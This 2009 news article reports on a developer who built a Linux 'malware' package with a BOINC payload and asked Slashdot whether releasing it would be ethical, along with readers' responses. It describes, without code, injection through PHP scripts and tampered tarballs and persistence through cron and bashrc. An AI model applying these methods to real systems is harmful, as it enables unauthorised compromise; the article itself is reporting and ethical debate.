Developer Ponders Release of Linux Malware

  • December 1, 2009
  • By Tom Jowitt

The lack of malware on Linux may be about to change after a developer admitted he has developed a ‘package of malware for Unix/Linux’

A developer who claims he is tired of the “Linux is secure” argument has set out to develop a “package of malware for Unix/Linux” in order to help ethical hackers demonstrate the vulnerability of the open-source operating system.

“I was fed up with the general consensus that Linux is oh-so-secure and has no malware,” a developer going by the name of buchner.johannes wrote on Ask Slashdot, in posting filed by kdawson.

“After a week of work, I finished a package of malware for Unix/Linux,” Johannes wrote. “Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects.”

Johannes said the malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads.

“I tested it to be injected by a PHP script (even circumventing safe mode), so that the web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files,” he said.

Johannes claimed the object of the exercise was to provide a payload so security people can ‘pwn’ systems to show security holes, without doing harm (such as deleting files or disrupting normal operation).

However, he admitted to doubts over how ethical it would be to release the toolkit.

He has concerns that a genuine hacker would rip out the BOINC payload and put “in something really evil, could be turned into proper Linux malware.”

“On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary,” he said.

“Technically, it is a nice piece, but should I release it? I don’t want to turn the Linux desktop into Windows, hence I’m slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?” he asked.

There was a mix of opinions to Johannes’s debate over releasing the malware. One user by the name of Jeff321 said that he believed Johannes has already decided.

“There were two options,” Jeff321 wrote. “1. Release it anonymously and take no credit. 2. Write about it and get some credit (but then you can’t actually release it due to legal issues).”

“You can’t (and won’t) release it now,” he added. “If somebody gets attacked with your code, guess who they’re going to prosecute and/or sue.”

Another user, by the name of sopssa also waded in. “The summary says it doesn’t actually do anything malicious and it isn’t a worm. There is no legal reason why he couldn’t release the code and/or a paper about it,” said sopssa.

“The thing is, it’s stupid for people to keep thinking their systems are insanely secure,” he wrote. “Linux users fall for this all the time because they’ve heard so from lots of other Linux users. It’s better to show people that it is actually possible, and maybe it leads to better-secured systems too.”